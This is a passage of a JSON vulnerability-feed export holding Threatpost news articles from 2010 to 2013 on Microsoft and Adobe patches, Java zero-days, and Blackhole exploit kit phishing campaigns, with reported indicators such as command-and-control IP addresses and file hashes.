their patch Tuesday announcement today. The Redmond, Wash., software giant rated three of the bulletins as \u2018critical,\u2019 all of which could lead to remote code execution, and the remaining four as \u2018important.\u2019\n\nThe first critical bulletin resolves a privately reported bug in Microsoft Office through which an attacker could remotely execute code after the user opens a specially crafted RTF file. Upon successful exploitation, the attacker would possess the same user rights as the current user. Users with fewer user rights would be less impacted than those that operate with administrative user rights.\n\nThe second patch resolves three publicly disclosed bugs and seven privately disclosed ones in Microsoft Office, Microsoft Windows, the Microsoft .NET Framework, and Microsoft Silverlight. These could also lead to remote code execution if an attacker can find a way to trick users into opening a specially crafted document or visiting a webpage that embeds TrueType font files.\n\nThis set of vulnerabilities fixed by the MS12-034 patch is designed to fix one of the vulnerabilities exploited by the Duqu malware. Microsoft had already patched that bug in other applications, but in the last few months it had discovered that a snippet of code that was part of the CVE-2011-3402 vulnerability was present in other places in Microsoft products, as well.\n\n\u201cIn the time since we shipped MS11-087, we discovered that several Microsoft products contained a copy of win32k.sys\u2019s font parsing code. Unfortunately, each copy of the code also contained the vulnerability addressed by MS11-087. The most troublesome copy was in gdiplus.dll. We know that several third party applications \u2013 3rd party browsers in particular \u2013 might use gdiplus.dll to parse and render custom fonts. Microsoft Office\u2019s version of gdiplus, called ogl.dll, also contained a copy of the vulnerable code. Silverlight included a copy of the vulnerable code. And the Windows Journal viewer included a copy of the vulnerable code,\u201d Microsoft said in a blog post today. \n\n\u201cIn addition to addressing the vulnerabilities described in the bulletin, this security update also closes the malicious keyboard layout file attack vector. Windows Vista introduced a requirement that all keyboard layout files be loaded from %windir%system32. MS12-034 ports that change downlevel to Windows XP and Windows Server 2003 as well.\u201d\n\nThe last critically rated patch fixes two privately reported vulnerabilities in Windows and the .NET Framework. These could allow for remote code execution on client systems where the user views a specially crafted webpage that can run XAML browser applications. Again, users with fewer rights are less impacted.\n\nAs for the four important patches remaining, the first resolves six vulnerabilities in Microsoft office and the second resolves one vulnerability in Microsoft Visio viewer. Both vulnerabilities, if left unpatched, could lead to remote code execution. The last two important patches could both lead to elevation of privileges. The first resolves two bugs in TCP/IP and the second resolves a vulnerability in Windows Partition Manager.\n\nYou can find the bulletin summary [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) on Microsoft\u2019 TechNet blog.\n", "cvss3": {}, "published": "2012-05-08T18:22:19", "type": "threatpost", "title": "Microsoft Ships Seven Bulletins Fixing 23 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:10E07EA1EC79D258B439B4CA2F562B51", "href": "https://threatpost.com/microsoft-ships-seven-bulletins-fixing-23-bugs-050812/76540/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:18", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055121/adobe_2.jpg)](<https://threatpost.com/recently-patched-adobe-pdf-flaw-being-actively-exploited-031010/>)Malicious hackers have pounced on a newly patched Adobe PDF Reader vulnerability to plant Trojan downloaders on tardy Windows users.\n\nAccording to researchers in Microsoft\u2019s malware protection center, the vulnerability (CVE-2010-0188) was patched less than a month ago, proving that malicious hackers are quick to find fresh targets for malware.\n\nMicrosoft\u2019s Marian Radu [explains](<http://blogs.technet.com/mmpc/archive/2010/03/08/cve-2010-0188-patched-adobe-reader-vulnerability-is-actively-exploited-in-the-wild.aspx>):\n\nWhile recently analyzing a malicious PDF file, I noticed a vulnerability exploited by the sample which I\u2019ve never encountered before. After a bit of research I came to the conclusion that this specific sample exploited CVE-2010-0188. \n\nThis is a fresh vulnerability, information about which was [just published this February](<http://www.adobe.com/support/security/bulletins/apsb10-07.html>). It is described as possibly leading to arbitrary code execution, which is exactly what\u2019s happening. \n\nMadu said the malicious PDF causes Adobe Reader to open and then close. While this is happening, an executable file named a.exe is dropped directly onto the C: drive. \n\nThe dropped executable, which is actually embedded into the PDF file, tries to connect to a .biz registered domain to download other files. JavaScript is again used to successfully exploit this vulnerability, so disabling it for unknown documents might be a good idea. \n\nOnly Windows users who have not yet updated to the newest version of Adobe Reader are vulnerable to this threat.\n\nSeparately, the folks at F-Secure has [released a chart](<http://www.f-secure.com/weblog/archives/00001903.html>) showing the gradual growth of Adobe Reader as the most commonly exploited software in targeted attacks.\n", "cvss3": {}, "published": "2010-03-10T21:37:09", "type": "threatpost", "title": "Recently Patched Adobe PDF Flaw Being 'Actively Exploited'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2018-08-15T13:16:25", "id": "THREATPOST:1930272869F47EB9224C7FAB6F1DC5B1", "href": "https://threatpost.com/recently-patched-adobe-pdf-flaw-being-actively-exploited-031010/73663/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:50", "description": "Attackers are sending spoofed \u201cpending notification\u201d emails to Facebook users, claiming that the recipients overlooked some alert on the world\u2019s largest social network, and providing them with a link that supposedly leads to the allegedly neglected content but which, in reality, funnels users to a series of compromised websites hosting[ the Black Hole Exploit Kit](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/>), according to researcher Dancho Danchev.\n\nThe malicious email, which can be seen below, is crafted to and does a serviceable job of mimicking Facebook\u2019s widely-recognizable interface. However, it also contains a typo that is indicative of the sorts of writing errors that have become a hallmark of spam campaigns in general.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073145/facebook_pending_notifications.png)\n\nIn his write-up on Webroot\u2019s Threat Blog, Danchev identifies [CVE-2010-0188](<https://threatpost.com/fake-facebook-alert-emails-link-black-hole-sites-112712/>), an Adobe bug patched in 2010, as an example of an exploit served in the attack. He also claims that the malicious payload and exploits appear to be hosted on a \u2018ceredinople[dot]ru,\u2019 whereas the compromised website that the email links to is \u2018covellgroup[dot]com/new.htim?_RAINDOM_CHARACTERS.\u2019\n\nSuccessful exploitation drops [this Win32 executable](<https://www.virustotal.com/file/1748f38a7c0d4ac1aa023dac666727fb799ded5fc946b2b7732cc3a5da51290d/analysis/>) on its victims. It is detected by most antivirus products but is identified by a number of different names.\n\nDanchev lists a number of IP addresses and related domains implicated in this campaign. You can see them in his report [here](<http://blog.webroot.com/2012/11/27/bogus-facebook-pending-notifications-themed-emails-serve-client-side-exploits-and-malware/>).\n\nThis isn\u2019t the first time Facebook users have been targeted in this kind of attack, in fact, so pervasive is the phishing problem for Facebook that they created a dedicated email address, Phish@FB.com, where users can forward suspect emails for inspection.\n", "cvss3": {}, "published": "2012-11-27T16:33:19", "type": "threatpost", "title": "Fake Facebook Alert Emails Link to Black Hole Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2013-04-17T20:02:44", "id": "THREATPOST:E9BF216DCC61669F4F582E1BBBAC6123", "href": "https://threatpost.com/fake-facebook-alert-emails-link-black-hole-sites-112712/77247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:03", "description": "Criminal hackers launched an attack campaign earlier this week in which they sent a slew of emails purporting to come from the financial software developer Intuit. The emails contained links that led to sites hosting the Blackhole exploit kit in an apparent attempt to infect the machines of corporate users.\n\nIn a Webroot analysis, Dancho Danchev explains that the two separate campaigns imitated Intuit Payroll\u2019s direct deposit system in hopes that their recipients would follow malicious links included in the emails and thus infect themselves with the latest version of the[ Black Hole Exploit kit](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/>).\n\nThe exploit is serving an [Adobe](<https://threatpost.com/adobe-extends-security-reader-and-acrobat-better-sandbox-force-aslr-101712/>) vulnerability from two years ago, [CVE-2010-0188](<https://threatpost.com/recently-patched-adobe-pdf-flaw-being-actively-exploited-031010/>). A successful exploitation will load \u2018MD5: 5723f92abf257101be20100e5de1cf6f\u2019 and \u2018MD5: 06c6544f554ea892e86b6c2cb6a1700c\u2019 to its host.\n\nThe various malicious domains used in the campaign responded to the same set of IP addresses. You can find a list of the malicious URLs in [Danchev\u2019s write-up](<http://blog.webroot.com/2012/10/18/intuit-payroll-confirmation-inquiry-themed-emails-lead-to-the-black-hole-exploit-kit/>).\n\nThe first campaign\u2019s emails looked like [this](<http://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit.png>) and second campaign looked like [this](<http://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_02.png>). Users that followed the malicious link were presented with[ a bogus loading screen](<http://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_01.png>) that claimed they would not be able to access their QuickBooks account without an update to the Intuit Security Tool.\n", "cvss3": {}, "published": "2012-10-19T15:11:39", "type": "threatpost", "title": "Fake Payroll Confirmation Email Leads to Black Hole Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2013-04-17T20:02:47", "id": "THREATPOST:8C3A036DB8F89D3EF360D44B4BFEF81F", "href": "https://threatpost.com/fake-payroll-confirmation-email-leads-black-hole-exploit-kit-101912/77132/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:42", "description": "![Adobe vulnerability](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065230/adobe_insecurity1_0.jpg)Thanks to the wonderful tendency of users not to update their applications, old vulnerabilities never die, they just get overtaken by newer and shinier ones. The attackers know this well, and every once in a while they serve up a nice reminder to the rest of us. The most recent one of these is a string of attacks against an Adobe Reader vulnerability from 2010.\n\nThe vulnerability, which is more than two years old, is a [flaw in Reader and Acrobat](<http://www.adobe.com/support/security/bulletins/apsb10-07.html>) that can be exploited remotely. At the time of the first reports about the bug, there were active attacks going on against it and exploit code was circulating online. But the [CVE-2010-0188](<http://www.securityfocus.com/bid/38195/info>) bug didn\u2019t turn into one of those huge things that involve widespread malware attacks and so on. And it\u2019s been patched for a long time at this point, but that doesn\u2019t mean it\u2019s of no use to the bad guys anymore.\n\nResearchers at Symantec have found that there are still attacks ongoing against the bug, which affects Reader and Acrobat on all of the major platforms. The attacks involve some highly obfuscated JavaScript, as such attacks are wont to do, and the end result is that once the resultant shell code is on the victim\u2019s machine, it attempts to download a malicious executable from a remote server.\n\nThe attacks against this bug have been coming in waves for the last month or so, and Symantec researchers said that the company has seen more than 10,000 such attacks in just the last couple of weeks.\n\n\u201cThe JavaScript was embedded in an XFA object (object 8 in the above figure) in an Acrobat Form. The JavaScript manipulated a subform field by using a reference to an embedded element, \u2018qwe123b\u2019 in the example. When such an exploited PDF sample is loaded into the vulnerable PDF reading application, the XFA initialize activity is triggered and the embedded JavaScript will be called. After manually de-obfuscating it, we were able to extract the hidden JavaScript,\u201d [Jason Zhang of Symantec](<https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/>) wrote in an analysis of the attacks. \n\nOnce the JavaScript runs, it does a few things, including checking the version of the vulnerable application that\u2019s on the targeted machine. That version number is then converted into a huge integer and the JavaScript builds an exploit and shell code that\u2019s specific to that version. It then sprays the shell code into the application\u2019s memory and is off and running. But that\u2019s only half of the game.\n\nThe shell code includes an obfuscated URL to which the code attempts to connect and then download an executable. \n\n\u201cIt clearly shows that a malicious executable file will be downloaded once the shellcode gets executed successfully. Unfortunately, the malicious file link only existed for a very short time and we have been unable to retrieve the actual executable sample as yet,\u201d Zhang said.\n", "cvss3": {}, "published": "2012-02-22T15:45:46", "type": "threatpost", "title": "Waves of Attacks Target Adobe Reader Bug From 2010", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2013-04-17T16:32:46", "id": "THREATPOST:456A3BB9FB7D16110E8A4ABAC506A95F", "href": "https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/76243/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "description": "![Oracle patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073343/oracle_patch_5.jpg)Oracle\u2019s emergency Java update this weekend for a [zero-day sandbox bypass vulnerability](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>) hasn\u2019t exactly kicked off a love-fest for the company among security experts. Researchers are still cautious about recommending users re-enable the ubiquitous software, despite the availability of the fix for the latest zero-day to target the platform. \n\nSome caution there are still ways to bypass a [heightened security configuration in the update](<http://www.oracle.com/technetwork/java/javase/7u-relnotes-515228.html>), and yet others remain concerned about fixes for vulnerabilities reported months ago that still have not been addressed.\n\nAdam Gowdiak of Security Explorations in Poland said Oracle has yet to address vulnerabilities reported in April and September of last year; the [September vulnerability](<https://threatpost.com/new-zero-day-vulnerability-found-java-5-6-and-7-11-billion-desktops-affected-092612/>), like the one fixed over the weekend, is a sandbox bypass vulnerability that would enable an attacker to remotely execute code.\n\n\u201c[This] is especially important as a critical vulnerability that affects all Java SE versions released over the [last] eight years or so,\u201d Gowdiak said. \u201cWe have confirmed that our proof of concept code for it works with flying colors under Java SE 7 Update 11 released yesterday.\u201d\n\nJaime Blasco, a researcher with AlienVault, echoes Gowdiak\u2019s concerns that users should continue to leave the Java browser plug-in disabled.\n\n\u201cI don\u2019t think it\u2019s very useful right now,\u201d Blasco said. \u201cI think right now you won\u2019t find Java applets on most websites; regular users don\u2019t need Java right now.\u201d\n\n[Oracle rushed Java 1.7u11 out the door on Sunday](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>), less than a week after the discovery of the vulnerability and exploits in the wild. The most noteworthy enhancement is that Oracle has changed Java\u2019s default security level setting to high from medium. As a result, unsigned or self-signed Java applications will no longer run by default; users will have to approve applets to run them.\n\n\u201cWith the \u2018High\u2019 setting, the user is always warned before any unsigned application is run to prevent silent exploitation,\u201d Oracle said in its advisory.\n\nBlasco said while this is a good first step, it would not prevent an attacker from tricking the user via social engineering, for example, to execute a malicious applet manually. Also, an attacker with a valid, stolen digital certificate could also, in theory, sign and execute a malicious applet.\n\nThe call to disable Java began again in earnest last Thursday when French researcher [Kafeine](<http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>) reported that he found websites hosting exploits for a new zero-day and that exploit kits such as Blackhole had already incorporated the exploit. Soon, most of the major exploit kits including Cool, Nuclear Pack, Sakura, and Redkit, had the exploits. By Friday, an exploit module for the zero-day had been added to [Metasploit](<https://community.rapid7.com/community/metasploit/blog/2013/01/11/omg-java-everybody-panic>), and it was game-on.\n\nHD Moore, Metasploit creator, said the issue in Java 7u10 was a privilege-escalation vulnerability ([CVE-2013-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>)) in the MBeanInstantiator.\n\n\u201cA lot of the recent Java exploits use a technique similar to this one where they find a class that\u2019s already loaded in memory that accesses an object outside the sandbox, and then they use that object to load arbitrary code,\u201d Moore told Threatpost last week. \u201cIt\u2019s about as bad as you can get in terms of a reliable Java exploit that affects the latest version of Java 1.7. It\u2019s already being used by all the bad guys and at this point, it\u2019s just catch-up and how fast Oracle can respond.\u201d\n\nFireEye reported last week, and Blasco confirmed today, that some [exploits are serving up ransomware](<https://threatpost.com/incomplete-java-patch-paved-way-latest-zero-day-mess-011113/>). Now that the exploits are part of kits, any payload from banking Trojans, to keyloggers or botnets can be added, researchers said.\n\n\u201cHaving this in the exploit kits is the worst possible scenario; exploit kits are one of the biggest security issues users are facing,\u201d Blasco said. \u201cIf you are a cybercriminal and have money, you will get something that works. You can buy anything, even without knowing anything about coding exploits.\u201d\n\nJava\u2019s availability on numerous platforms from Windows to Linux to Mac OS X makes it an [attractive target for exploit writers](<https://threatpost.com/security-experts-recommend-long-hard-look-disabling-java-browser-plug-100412/>). A reliable exploit will run anywhere.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere. You will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n", "cvss3": {}, "published": "2013-01-14T16:40:39", "type": "threatpost", "title": "Emergency Zero-Day Patch Does Not Quiet Calls to Disable Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-05-10T14:25:22", "id": "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "href": "https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/77401/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "description": "Scammers are spamming out malicious emails purporting to come from payroll processing company ADP, according Dancho Danchev of Webroot.\n\nThe emails arrive under the subject line \u201cADP Immediate Notifications\u201d and contain links to compromised websites hosting the latest iteration of the[ Blackhole exploit kit](<https://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>). The kit is serving CVE-2013-0422 Java exploit, which Danchev claimed was still active when he published his report. However, [Oracle appears to have patched the bug sometime yesterday](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>).\n\nThe exploit is dropping the \u2018Win32/Cridex.E\u2019 and \u2018Win32/Farei\u2019 Trojans, which are detected by 12 and eight out of 46 antivirus scanners respectively. After exploitation, the malware is phoning home to command and control servers at the following IP addresses: 173.201.177.77, 132.248.49.112, 95.142.167.193, and 81.93.250.157.\n\nThe campaign makes use of a healthy list of suspicious looking URLs that you can check out along with [Danchev\u2019s write-up](<http://blog.webroot.com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malware/>). It\u2019s fairly commonplace for social engineers [to mimic ADP in their phishing campaigns](<https://threatpost.com/fake-adp-and-fdic-notifications-leading-users-blackhole-exploit-kit-091412/>) because of the vastness of the company\u2019s payroll operation.\n\n![ADP Notification](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073343/adp_notification.jpg)\n", "cvss3": {}, "published": "2013-01-14T18:29:21", "type": "threatpost", "title": "ADP-Themed Phishing Emails Lead to Blackhole Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-05-13T19:06:03", "id": "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "href": "https://threatpost.com/adp-themed-phishing-emails-lead-blackhole-sites-011413/77402/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:16", "description": "Another day, another media company hacked. This time it\u2019s NBC which has fallen to victim hackers on the heels of compromises of the _[New York Times](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/>)_ and _Wall Street Journal _websites. Various experts have confirmed that NBC\u2019s website is compromised and leading visitors to the dangerous [Citadel banking Trojan](<https://www.google.com/url?q=http://threatpost.com/en_us/blogs/citadel-trojan-it-s-not-just-banking-fraud-anymore-020113&sa=U&ei=wosmUfPPKYei2QXMy4C4Ag&ved=0CAoQFjAB&client=internal-uds-cse&usg=AFQjCNHMrwHVyHwOjJNPZQxj_el4hxq2wQ>). The site is reportedly hosting an iframe that is redirecting visitors to sites hosting the RedKit Exploit Kit which is serving up the Citadel malware. \n\n\n[The HitmanPro blog](<http://hitmanpro.wordpress.com/2013/02/21/nbc-com-hacked-serving-up-citadel-malware/>) said there were two malicious links on the NBC site connecting to the exploits, one on the home page and another on an internal page. The links serve Java and PDF exploits that drop Citadel; the Java exploit is the same [sandbox bypass vulnerability](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>) patched in Java 7u11.\n\nThe site remained infected as of 3:30 p.m. ET as attackers were rotating out the iframes regularly, each pointing to a number of attack pages, including a site with a Russian name that translates to my-new-sploit [dot]com.\n\nResearchers at Kaspersky Lab confirmed the redirections are leading victims to Citadel and Zeus (Trojan-Spy.Win32.Zbot.jfgj). Citadel is a version of Zeus and is used primarily for banking fraud. Experts say it is sold only in the Russian underground and only to certain customers in order to keep support costs down and reduce the risk of infiltration by law enforcement.\n\nIndependent security consultant Dancho Danchev [tied the NBC attacks to a recent spam campaign targeting Facebook and Verizon](<http://ddanchev.blogspot.com/2013/02/dissecting-nbcs-exploits-and-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+DanchoDanchevOnSecurityAndNewMedia+\$Dancho+Danchev+-+Mind+Streams+of+Information+Security+Knowledge!\$>). Danchev said cybercriminals were trying to impersonate Facebook and trick users into thinking their accounts had been shut down. Malicious links used in the spam messages pointed to sites hosting exploits served by the Black Hole Exploit Kit.\n\nDanchev said one of the domains used in the NBC attack matches one used in the Facebook spam campaign, while an email address used to register another domain in the NBC attack matches one similarly used in a campaign against Verizon.\n\n\u201cSomeone\u2019s multitasking,\u201d Danchev said. \u201cThat\u2019s for sure.\u201d\n\nNBC image via [Xurble](<http://www.flickr.com/photos/xurble/>)\u2018s Flickr phtoostream, Creative Commons\n", "cvss3": {}, "published": "2013-02-21T21:07:10", "type": "threatpost", "title": "NBC Website Hacked, Leading Visitors to Citadel Banking Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-05-08T15:53:59", "id": "THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39", "href": "https://threatpost.com/nbc-website-hacked-leading-visitors-citadel-banking-malware-022113/77554/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:14", "description": "After a glorious 72-hour stretch without one, security researchers confirmed yesterday that they found [yet another zero-day vulnerability](<https://threatpost.com/two-more-java-zero-days-found-polish-research-team-022513/>) in Oracle\u2019s thoroughly troubled Java platform.\n\nWith a little help from Hermes Bojaxhi and his team at [Cyber Engineering Services](<http://www.cyberesi.com/>), researchers from the security firm FireEye [found](<http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html>) that attackers have successfully exploited this latest zero-day vulnerability in the wild, compromising the machines of users running browsers with Java six update 41 and Java seven update 15.\n\nFireEye researchers Darien Kindlund and Yichong Lin claim that this vulnerability is different from the seemingly endless parade of Java zero-days that precede it. A security manager could pretty easily disable the other vulnerabilities, Kindlund and Lin explain. This one, on the other hand, allows for arbitrary memory reading and writing in the Java Virtual Machine (JVM) process.\n\nThe exploit is compromising browsers by targeting JVM\u2019s internal data structure, overwriting the memory there to zero in order to download a McRAT executable.\n\nThe exploit is apparently not all that reliable due to the large amount of data it attempts to overwrite. In most cases, Kindlund and Lin are watching JVM crash as it attempts, but ultimately fails to download the McRAT executable. However, when payload installs successfully, it reaches out to its command and control server with an HTTP request and starts copying itself into the dynamic link library.\n\nMcRAT is also performing the following pair of registry modifications: \u201cREGISTRYMACHINESYSTEMControlSet001ServicesAppMgmtParameters\u201dServiceDll\u201d = C:Documents and SettingsadminAppMgmt.dll\u201d and \u201cREGISTRYMACHINESYSTEMControlSet001ServicesAppMgmtParameters\u201dServiceDll\u201d = %SystemRoot%System32appmgmts.dll.\u201d\n\nFireEye notified Oracle about the bug before publication and is urging users to disable Java in their browsers or set their Java security settings to \u201chigh\u201d and avoid the execution of unknown Java applets until a patch is shipped. Oracle has since assigned a common vulnerability entry to the flaw: CVE-2013-1493.\n\nIt\u2019s been a turbulent couple of months for Java as an absolute torrent of zero-day vulnerabilities has researchers seriously considering [disabling Oracle\u2019s nearly ubiquitous platform altogether](<https://threatpost.com/its-time-abandon-java-012113/>).\n", "cvss3": {}, "published": "2013-03-01T16:34:30", "type": "threatpost", "title": "The Java Zero-Day Procession Continues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1493"], "modified": "2013-05-13T15:54:08", "id": "THREATPOST:53FFA3071578083E01768081147BA316", "href": "https://threatpost.com/java-zero-day-procession-continues-030113/77575/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:29", "description": "There are a number of compromised sites on the popular blogging platform, WordPress, which, according to [a Trend Labs report](<http://blog.trendmicro.com/compromised-wordpress-sites-drive-users-to-blackhole-exploit-kit>), are actively infecting users with the[ CRIDEX worm](<https://threatpost.com/video-new-banking-trojan-caught-breaking-captcha-013012/>).\n\nThe infections are part of a [social engineering](<https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/>) campaign that lures users with emails purporting to come from trusted sources like [LinkedIn](<http://www.linkedin.com/>) and [the Better Business Bureau](<http://www.bbb.org/>), Trend Labs warned.\n\nE-mails purporting to come from the Better Business Bureau informs its recipients of a (non-existent) complaint lodged against his or her business. The email includes a link to the \u201cComplaint Report,\u201d which leads to one of the infected WordPress sites.\n\nPhony LinkedIn emails pose as invitation notifications and pending messages. They include a number of links, all of which lead to compromised WordPress sites.\n\nAccording to Trend researchers, users who click the links are subject to Web based attacks that [target a vulnerability in Adobe\u2019s Reader and Acrobat](<https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/>) software ([CVE-2010-0188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>)) and a common Windows Help Center vulnerability ([CVE-2010-1885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>)). After exploiting the vulnerabilities, attackers push copies of the Blackhole exploit kit to infect users with the CRIDEX worm.\n\nTrend Labs reports that WORM_CRIDEX.IC is generating a number of random domains using domain generating algorithms (DGA). The technique is commonly used to evade law enforcement and botnet take-downs. The behavior of the sample is dependent upon the specific configuration file, which, in Trend Labs case, was unavailable to them. However, based on their static analysis, the malware is capable of executing and deleting files and retrieving certificates from a certificate store.\n\nThis isn\u2019t the first time that [WordPress](<http://wordpress.org/>) sites have been used to push the Blackhole Exploit kit. In November of last year, similar reports surfaced in which [WordPress users were being re-directed](<https://threatpost.com/compromised-wordpress-sites-redirecting-black-hole-exploit-kit-servers-110211/>) to servers hosting the Blackhole kit.\n", "cvss3": {}, "published": "2012-03-22T15:44:13", "type": "threatpost", "title": "Mass WordPress Compromise Fuels CRIDEX Worm Outbreak", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "modified": "2013-04-17T20:05:35", "id": "THREATPOST:0A9F9D2C917F57EAE16B15B6166B45F6", "href": "https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/76357/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:31", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054950/adobe_reader_patch_11.jpg)](<https://threatpost.com/adobe-plugs-critical-pdf-code-execution-flaw-021610/>)Adobe \ntoday released an out-of-band security update to patch a pair of gaping \nholes that expose hundreds of millions of computer users to remote code \nexecution attacks.\n\nThe vulnerabilities are rated \u201ccritical\u201d and affect Adobe Reader and Adobe Acrobat on all platforms \u2014 Windows, Mac and Linux.\n\nThis \nPDF Reader/Acrobat update falls outside of the company\u2019s scheduled \nquarterly patch cycle. It is not yet clear why Adobe opted for an \nout-of-band patch but the presence of Microsoft\u2019s security research \nteam as a flaw-finder on this bulletin suggests Redmond may have \npressured Adobe to rush out a fix.\n\nAdobe insists there are no active attacks or exploit code publicly available.\n\nThere is also a clear connection to a [patch released last week](<http://www.adobe.com/support/security/bulletins/apsb10-06.html>) \nfor Adobe Flash Player. That Flash patch covered a hole \n(CVE-2010-0186) that could subvert the domain sandbox and make \nunauthorized cross-domain requests.\n\nIn today\u2019s Reader/Acrobat bulletin, the same vulnerability is \nreferenced as affecting Adobe Reader 9.3 for Windows, Macintosh and \nUNIX, Adobe Acrobat 9.3 for Windows and Macintosh, and Adobe Reader 8.2 \nand Acrobat 8.2 for Windows and Macintosh.\n\nAdobe also credited Microsoft\u2019s researcher with discovering a a [critical](<http://www.adobe.com/devnet/security/security_zone/severity_ratings.html>) \nvulnerability (CVE-2010-0188) that could cause the application to \ncrash and could potentially allow an attacker to take control of the \naffected system.\n\nFrom the [advisory](<http://www.adobe.com/support/security/bulletins/apsb10-07.html>):\n\n> _Adobe recommends users of Adobe Reader 9.3 and earlier \nversions for Windows, Macintosh and UNIX update to Adobe Reader 9.3.1. \n(For Adobe Reader users on Windows and Macintosh who cannot update to \nAdobe Reader 9.3.1, Adobe has provided the Adobe Reader 8.2.1 update.) \nAdobe recommends users of Adobe Acrobat 9.3 and earlier versions for \nWindows and Macintosh update to Adobe Acrobat 9.3.1. Adobe recommends \nusers of Acrobat 8.2 and earlier versions for Windows and Macintosh \nupdate to Acrobat 8.2.1._\n\nAdobe is shipping these patches via the product\u2019s automatic update \nfacility. The default installation configuration runs automatic updates \non a regular schedule, and can be manually activated by choosing Help \n> Check For Updates Now.\n\n**UPDATE**: Adobe spokeswoman Wiebke Lips answers some of the lingering questions:\n\n_Why go out-of-band with this update? Are there attacks or exploit code in \nthe wild?_\n\nThe \nFlash Player vulnerability we fixed on February 11 also affects Adobe Reader \nand Acrobat. Rather than waiting for the next quarterly update for Adobe Reader \nand Acrobat, which is scheduled for April, Adobe decided to make this fix \navailable as an out-of-cycle update. Adobe \nis not aware of any exploits in the wild for any of the issues patched in this release.\n\n_It looks like the Adobe Flash Player flaw from \nlast week now affects Reader/Acrobat. Are you planning on 